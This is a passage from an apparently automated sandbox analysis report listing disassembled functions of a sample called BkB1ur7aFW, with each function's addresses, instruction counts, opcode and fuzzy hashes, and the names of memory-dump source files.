                                                              • Opcode ID: 5e7e274344ad0e2c83f56acd7e9b3174ab1ffb76cab6e8af272aa5a992f55c67
                                                              • Instruction ID: 379ad23efa3bf6ea7e7e1d4666435a616088e764ea38771b6d509f649abe404d
                                                              • Opcode Fuzzy Hash: 5e7e274344ad0e2c83f56acd7e9b3174ab1ffb76cab6e8af272aa5a992f55c67
                                                              • Instruction Fuzzy Hash: C1717972D087818BD7118F28C8806A97BA2EFD6314F28836EFCD65B353E7789A41C741
                                                              Function 0077A000 Relevance: .1, Instructions: 122COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction ID: a124fa3d3f3bb9d37c87939de6f669fce065ce7d334d78a2fa4e6972ce98bd1c
                                                              • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                                                              • Instruction Fuzzy Hash: EF31B2317083196BEF14AD69C4C022EF6D2ABD83A0F55CA3CE58DC3381F9758C48C682
                                                              Function 071103FE Relevance: .1, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2036208525.0000000007110000.00000040.00001000.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7110000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca8bb813e20f7110dd05dd82d3e05348f5d8cdc780a9779b791e993d99725da4
                                                              • Instruction ID: d54c24ef112422e7fe9a0c30917f3f23ad96e8efb763d3e40486182134c88dac
                                                              • Opcode Fuzzy Hash: ca8bb813e20f7110dd05dd82d3e05348f5d8cdc780a9779b791e993d99725da4
                                                              • Instruction Fuzzy Hash: 1FF0C2FB6181507DB117D1516B98AFB6B3DD4C6A30331883BF802CA846E3890A8F4172
                                                              Function 005D9980 Relevance: .0, Instructions: 7COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd91c68cb2d10beb3f8705b578d577edaf22d3c12af85a0780a537d57b7cbe29
                                                              • Instruction ID: 24a87513ee648a1daef2d31baa237d0e4cf9823fec59b5c736256d426ed1ed06
                                                              • Opcode Fuzzy Hash: cd91c68cb2d10beb3f8705b578d577edaf22d3c12af85a0780a537d57b7cbe29
                                                              • Instruction Fuzzy Hash: 80B01231900200CF5716CB38DC714D132B2739130135AD4EAD00346012D635D0038600
                                                              Function 00456810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: [
                                                              • API String ID: 0-784033777
                                                              • Opcode ID: 9e852875622c2d34a309df10353ae372f772b379f8aa8779088bafef30e164bf
                                                              • Instruction ID: 8bc4abd00fd8dec1fd6d5c24b5a12795f58965501a855411a2a2596d3c7202e3
                                                              • Opcode Fuzzy Hash: 9e852875622c2d34a309df10353ae372f772b379f8aa8779088bafef30e164bf
                                                              • Instruction Fuzzy Hash: 6DB147716083615BDB358A24888473B7AD8EB55307F9A052FECC5C7283EA3DE94C875B